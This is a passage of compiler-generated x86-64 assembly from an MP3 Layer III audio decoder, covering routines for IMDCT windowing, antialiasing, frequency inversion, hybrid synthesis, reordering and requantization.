-152[rbp] addsd xmm0, QWORD PTR -144[rbp] cvtsd2ss xmm0, xmm0 movss DWORD PTR -88[rbp], xmm0 add DWORD PTR -96[rbp], 1 .L249: mov eax, DWORD PTR -84[rbp] shr eax cmp DWORD PTR -96[rbp], eax jb .L256 mov ecx, DWORD PTR -92[rbp] mov edx, DWORD PTR -132[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] movss xmm0, DWORD PTR [rdx+rax] mov eax, DWORD PTR -92[rbp] lea rdx, 0[0+rax*4] mov rax, QWORD PTR -128[rbp] add rax, rdx mulss xmm0, DWORD PTR -88[rbp] movss DWORD PTR [rax], xmm0 add DWORD PTR -92[rbp], 1 .L248: mov eax, DWORD PTR -92[rbp] cmp eax, DWORD PTR -84[rbp] jb .L257 .L259: nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L258 call __stack_chk_fail@PLT .L258: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE29: .size IMDCT_Win, .-IMDCT_Win .type L3_Antialias, @function L3_Antialias: .LFB30: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -36[rbp], edi mov DWORD PTR -40[rbp], esi mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 24 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L261 mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 28 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 2 jne .L261 mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 32 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] test eax, eax je .L269 .L261: mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 24 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L263 mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 28 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 2 jne .L263 mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 32 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L263 mov eax, 2 jmp .L264 .L263: mov eax, 32 .L264: mov DWORD PTR -20[rbp], eax mov DWORD PTR -28[rbp], 1 jmp .L265 .L268: mov DWORD PTR -24[rbp], 0 jmp .L266 .L267: mov edx, DWORD PTR -28[rbp] mov eax, edx sal eax, 3 add eax, edx add eax, eax sub eax, DWORD PTR -24[rbp] sub eax, 1 mov DWORD PTR -16[rbp], eax mov edx, DWORD PTR -28[rbp] mov eax, edx sal eax, 3 add eax, edx add eax, eax mov edx, eax mov eax, DWORD PTR -24[rbp] add eax, edx mov DWORD PTR -12[rbp], eax mov esi, DWORD PTR -16[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm1, DWORD PTR [rdx+rax] mov eax, DWORD PTR -24[rbp] lea rdx, 0[0+rax*4] lea rax, cs[rip] movss xmm0, DWORD PTR [rdx+rax] mulss xmm0, xmm1 mov esi, DWORD PTR -12[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm2, DWORD PTR [rdx+rax] mov eax, DWORD PTR -24[rbp] lea rdx, 0[0+rax*4] lea rax, ca[rip] movss xmm1, DWORD PTR [rdx+rax] mulss xmm1, xmm2 subss xmm0, xmm1 movss DWORD PTR -8[rbp], xmm0 mov esi, DWORD PTR -12[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm1, DWORD PTR [rdx+rax] mov eax, DWORD PTR -24[rbp] lea rdx, 0[0+rax*4] lea rax, cs[rip] movss xmm0, DWORD PTR [rdx+rax] mulss xmm1, xmm0 mov esi, DWORD PTR -16[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm2, DWORD PTR [rdx+rax] mov eax, DWORD PTR -24[rbp] lea rdx, 0[0+rax*4] lea rax, ca[rip] movss xmm0, DWORD PTR [rdx+rax] mulss xmm0, xmm2 addss xmm0, xmm1 movss DWORD PTR -4[rbp], xmm0 mov esi, DWORD PTR -16[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR -8[rbp] movss DWORD PTR [rdx+rax], xmm0 mov esi, DWORD PTR -12[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR -4[rbp] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -24[rbp], 1 .L266: cmp DWORD PTR -24[rbp], 7 jbe .L267 add DWORD PTR -28[rbp], 1 .L265: mov eax, DWORD PTR -28[rbp] cmp eax, DWORD PTR -20[rbp] jb .L268 jmp .L260 .L269: nop .L260: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE30: .size L3_Antialias, .-L3_Antialias .type L3_Frequency_Inversion, @function L3_Frequency_Inversion: .LFB31: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -20[rbp], edi mov DWORD PTR -24[rbp], esi mov DWORD PTR -8[rbp], 1 jmp .L271 .L274: mov DWORD PTR -4[rbp], 1 jmp .L272 .L273: mov edx, DWORD PTR -8[rbp] mov eax, edx sal eax, 3 add eax, edx add eax, eax mov edx, eax mov eax, DWORD PTR -4[rbp] add eax, edx mov esi, eax mov eax, DWORD PTR -20[rbp] mov ecx, DWORD PTR -24[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] mov edx, DWORD PTR -8[rbp] mov eax, edx sal eax, 3 add eax, edx add eax, eax mov edx, eax mov eax, DWORD PTR -4[rbp] add eax, edx movss xmm1, DWORD PTR .LC24[rip] xorps xmm0, xmm1 mov esi, eax mov eax, DWORD PTR -20[rbp] mov ecx, DWORD PTR -24[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -4[rbp], 2 .L272: cmp DWORD PTR -4[rbp], 17 jbe .L273 add DWORD PTR -8[rbp], 2 .L271: cmp DWORD PTR -8[rbp], 31 jbe .L274 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE31: .size L3_Frequency_Inversion, .-L3_Frequency_Inversion .type L3_Hybrid_Synthesis, @function L3_Hybrid_Synthesis: .LFB32: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 192 mov DWORD PTR -180[rbp], edi mov DWORD PTR -184[rbp], esi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov eax, DWORD PTR hsynth_init[rip] test eax, eax je .L277 mov DWORD PTR -168[rbp], 0 jmp .L278 .L283: mov DWORD PTR -176[rbp], 0 jmp .L279 .L282: mov DWORD PTR -172[rbp], 0 jmp .L280 .L281: mov esi, DWORD PTR -172[rbp] mov eax, DWORD PTR -168[rbp] mov ecx, DWORD PTR -176[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 6 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx add rax, rax add rax, rdx add rax, rsi lea rdx, 0[0+rax*4] lea rax, store.9[rip] pxor xmm0, xmm0 movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -172[rbp], 1 .L280: cmp DWORD PTR -172[rbp], 17 jbe .L281 add DWORD PTR -176[rbp], 1 .L279: cmp DWORD PTR -176[rbp], 31 jbe .L282 add DWORD PTR -168[rbp], 1 .L278: cmp DWORD PTR -168[rbp], 1 jbe .L283 mov DWORD PTR hsynth_init[rip], 0 .L277: mov DWORD PTR -176[rbp], 0 jmp .L284 .L290: mov edx, DWORD PTR -184[rbp] mov eax, DWORD PTR -180[rbp] add rax, rax add rax, rdx add rax, 24 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L285 mov edx, DWORD PTR -184[rbp] mov eax, DWORD PTR -180[rbp] add rax, rax add rax, rdx add rax, 32 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L285 cmp DWORD PTR -176[rbp], 1 jbe .L286 .L285: mov edx, DWORD PTR -184[rbp] mov eax, DWORD PTR -180[rbp] add rax, rax add rax, rdx add rax, 28 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] jmp .L287 .L286: mov eax, 0 .L287: mov DWORD PTR -164[rbp], eax mov edx, DWORD PTR -176[rbp] mov eax, edx sal eax, 3 add eax, edx add eax, eax mov esi, eax mov eax, DWORD PTR -180[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov ecx, DWORD PTR -184[rbp] mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] lea rcx, [rdx+rax] mov edx, DWORD PTR -164[rbp] lea rax, -160[rbp] mov rsi, rax mov rdi, rcx call IMDCT_Win mov DWORD PTR -172[rbp], 0 jmp .L288 .L289: mov eax, DWORD PTR -172[rbp] movss xmm1, DWORD PTR -160[rbp+rax*4] mov esi, DWORD PTR -172[rbp] mov eax, DWORD PTR -184[rbp] mov ecx, DWORD PTR -176[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 6 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx add rax, rax add rax, rdx add rax, rsi lea rdx, 0[0+rax*4] lea rax, store.9[rip] movss xmm0, DWORD PTR [rdx+rax] mov edx, DWORD PTR -176[rbp] mov eax, edx sal eax, 3 add eax, edx add eax, eax mov edx, eax mov eax, DWORD PTR -172[rbp] add eax, edx addss xmm0, xmm1 mov esi, eax mov eax, DWORD PTR -180[rbp] mov ecx, DWORD PTR -184[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss DWORD PTR [rdx+rax], xmm0 mov eax, DWORD PTR -172[rbp] add eax, 18 mov eax, eax movss xmm0, DWORD PTR -160[rbp+rax*4] mov esi, DWORD PTR -172[rbp] mov eax, DWORD PTR -184[rbp] mov ecx, DWORD PTR -176[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 6 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx add rax, rax add rax, rdx add rax, rsi lea rdx, 0[0+rax*4] lea rax, store.9[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -172[rbp], 1 .L288: cmp DWORD PTR -172[rbp], 17 jbe .L289 add DWORD PTR -176[rbp], 1 .L284: cmp DWORD PTR -176[rbp], 31 jbe .L290 nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L292 call __stack_chk_fail@PLT .L292: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE32: .size L3_Hybrid_Synthesis, .-L3_Hybrid_Synthesis .type L3_Reorder, @function L3_Reorder: .LFB33: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 2368 mov DWORD PTR -2356[rbp], edi mov DWORD PTR -2360[rbp], esi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov eax, DWORD PTR g_frame_header[rip+16] mov DWORD PTR -2324[rbp], eax mov edx, DWORD PTR -2360[rbp] mov eax, DWORD PTR -2356[rbp] add rax, rax add rax, rdx add rax, 24 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L314 mov edx, DWORD PTR -2360[rbp] mov eax, DWORD PTR -2356[rbp] add rax, rax add rax, rdx add rax, 28 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 2 jne .L314 mov edx, DWORD PTR -2360[rbp] mov eax, DWORD PTR -2356[rbp] add rax, rax add rax, rdx add rax, 32 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] test eax, eax je .L295 mov eax, 3 jmp .L296 .L295: mov eax, 0 .L296: mov DWORD PTR -2336[rbp], eax mov eax, DWORD PTR -2336[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -2324[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, edx add eax, eax add eax, edx mov DWORD PTR -2340[rbp], eax mov eax, DWORD PTR -2336[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -2324[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov ecx, DWORD PTR [rdx+rax] mov esi, DWORD PTR -2336[rbp] mov edx, DWORD PTR -2324[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rsi add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, ecx sub eax, edx mov DWORD PTR -2332[rbp], eax cmp DWORD PTR -2336[rbp], 0 jne .L297 mov eax, 0 jmp .L298 .L297: mov eax, 36 .L298: mov DWORD PTR -2348[rbp], eax jmp .L299 .L309: mov eax, DWORD PTR -2348[rbp] cmp eax, DWORD PTR -2340[rbp] jne .L300 mov DWORD PTR -2344[rbp], 0 jmp .L301 .L302: mov ecx, DWORD PTR -2336[rbp] mov edx, DWORD PTR -2324[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, edx add eax, eax add edx, eax mov eax, DWORD PTR -2344[rbp] add edx, eax mov eax, DWORD PTR -2344[rbp] movss xmm0, DWORD PTR -2320[rbp+rax*4] mov esi, edx mov eax, DWORD PTR -2356[rbp] mov ecx, DWORD PTR -2360[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -2344[rbp], 1 .L301: mov edx, DWORD PTR -2332[rbp] mov eax, edx add eax, eax add eax, edx cmp DWORD PTR -2344[rbp], eax jb .L302 mov edx, DWORD PTR -2360[rbp] mov eax, DWORD PTR -2356[rbp] add rax, rax add rax, rdx add rax, 80 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp DWORD PTR -2348[rbp], eax jnb .L315 add DWORD PTR -2336[rbp], 1 mov eax, DWORD PTR -2336[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -2324[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, edx add eax, eax add eax, edx mov DWORD PTR -2340[rbp], eax mov eax, DWORD PTR -2336[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -2324[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov ecx, DWORD PTR [rdx+rax] mov esi, DWORD PTR -2336[rbp] mov edx, DWORD PTR -2324[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rsi add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, ecx sub eax, edx mov DWORD PTR -2332[rbp], eax .L300: mov DWORD PTR -2328[rbp], 0 jmp .L305 .L308: mov DWORD PTR -2344[rbp], 0 jmp .L306 .L307: mov edx, DWORD PTR -2344[rbp] mov eax, edx add eax, eax add edx, eax mov eax, DWORD PTR -2328[rbp] lea edi, [rdx+rax] mov esi, DWORD PTR -2348[rbp] mov eax, DWORD PTR -2356[rbp] mov ecx, DWORD PTR -2360[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] mov eax, edi movss DWORD PTR -2320[rbp+rax*4], xmm0 add DWORD PTR -2348[rbp], 1 add DWORD PTR -2344[rbp], 1 .L306: mov eax, DWORD PTR -2344[rbp] cmp eax, DWORD PTR -2332[rbp] jb .L307 add DWORD PTR -2328[rbp], 1 .L305: cmp DWORD PTR -2328[rbp], 2 jbe .L308 .L299: cmp DWORD PTR -2348[rbp], 575 jbe .L309 mov DWORD PTR -2344[rbp], 0 jmp .L310 .L311: mov edx, DWORD PTR -2324[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx sal rax, 2 mov rdx, rax lea rax, g_sf_band_indices[rip+140] mov edx, DWORD PTR [rdx+rax] mov eax, edx add eax, eax add edx, eax mov eax, DWORD PTR -2344[rbp] add edx, eax mov eax, DWORD PTR -2344[rbp] movss xmm0, DWORD PTR -2320[rbp+rax*4] mov esi, edx mov eax, DWORD PTR -2356[rbp] mov ecx, DWORD PTR -2360[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -2344[rbp], 1 .L310: mov edx, DWORD PTR -2332[rbp] mov eax, edx add eax, eax add eax, edx cmp DWORD PTR -2344[rbp], eax jb .L311 .L314: nop jmp .L293 .L315: nop .L293: mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L313 call __stack_chk_fail@PLT .L313: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE33: .size L3_Reorder, .-L3_Reorder .type L3_Requantize, @function L3_Requantize: .LFB34: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov DWORD PTR -36[rbp], edi mov DWORD PTR -40[rbp], esi mov eax, DWORD PTR g_frame_header[rip+16] mov DWORD PTR -4[rbp], eax mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 24 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L317 mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 28 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 2 jne .L317 mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 32 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] test eax, eax je .L318 mov DWORD PTR -28[rbp], 0 mov eax, DWORD PTR -28[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -24[rbp], eax mov DWORD PTR -20[rbp], 0 jmp .L319 .L321: mov eax, DWORD PTR -20[rbp] cmp eax, DWORD PTR -24[rbp] jne .L320 add DWORD PTR -28[rbp], 1 mov eax, DWORD PTR -28[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -24[rbp], eax .L320: mov ecx, DWORD PTR -28[rbp] mov edx, DWORD PTR -20[rbp] mov esi, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] mov edi, eax call Requantize_Process_Long add DWORD PTR -20[rbp], 1 .L319: cmp DWORD PTR -20[rbp], 35 jbe .L321 mov DWORD PTR -28[rbp], 3 mov eax, DWORD PTR -28[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, edx add eax, eax add eax, edx mov DWORD PTR -24[rbp], eax mov eax, DWORD PTR -28[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov ecx, DWORD PTR [rdx+rax] mov esi, DWORD PTR -28[rbp] mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rsi add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, ecx sub eax, edx mov DWORD PTR -8[rbp], eax mov DWORD PTR -20[rbp], 36 jmp .L322 .L328: mov eax, DWORD PTR -20[rbp] cmp eax, DWORD PTR -24[rbp] jne .L323 add DWORD PTR -28[rbp], 1 mov eax, DWORD PTR -28[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, edx add eax, eax add eax, edx mov DWORD PTR -24[rbp], eax mov eax, DWORD PTR -28[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov ecx, DWORD PTR [rdx+rax] mov esi, DWORD PTR -28[rbp] mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rsi add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, ecx sub eax, edx mov DWORD PTR -8[rbp], eax .L323: mov DWORD PTR -12[rbp], 0 jmp .L324 .L327: mov DWORD PTR -16[rbp], 0 jmp .L325 .L326: mov edi, DWORD PTR -12[rbp] mov ecx, DWORD PTR -28[rbp] mov edx, DWORD PTR -20[rbp] mov esi, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] mov r8d, edi mov edi, eax call Requantize_Process_Short add DWORD PTR -20[rbp], 1 add DWORD PTR -16[rbp], 1 .L325: mov eax, DWORD PTR -16[rbp] cmp eax, DWORD PTR -8[rbp] jb .L326 add DWORD PTR -12[rbp], 1 .L324: cmp DWORD PTR -12[rbp], 2 jbe .L327 .L322: mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 80 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp DWORD PTR -20[rbp], eax jb .L328 jmp .L337 .L318: mov DWORD PTR -28[rbp], 0 mov eax, DWORD PTR -28[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, edx add eax, eax add eax, edx mov DWORD PTR -24[rbp], eax mov eax, DWORD PTR -28[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov ecx, DWORD PTR [rdx+rax] mov esi, DWORD PTR -28[rbp] mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rsi add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, ecx sub eax, edx mov DWORD PTR -8[rbp], eax mov DWORD PTR -20[rbp], 0 jmp .L330 .L336: mov eax, DWORD PTR -20[rbp] cmp eax, DWORD PTR -24[rbp] jne .L331 add DWORD PTR -28[rbp], 1 mov eax, DWORD PTR -28[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, edx add eax, eax add eax, edx mov DWORD PTR -24[rbp], eax mov eax, DWORD PTR -28[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov ecx, DWORD PTR [rdx+rax] mov esi, DWORD PTR -28[rbp] mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rsi add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, ecx sub eax, edx mov DWORD PTR -8[rbp], eax .L331: mov DWORD PTR -12[rbp], 0 jmp .L332 .L335: mov DWORD PTR -16[rbp], 0 jmp .L333 .L334: mov edi, DWORD PTR -12[rbp] mov ecx, DWORD PTR 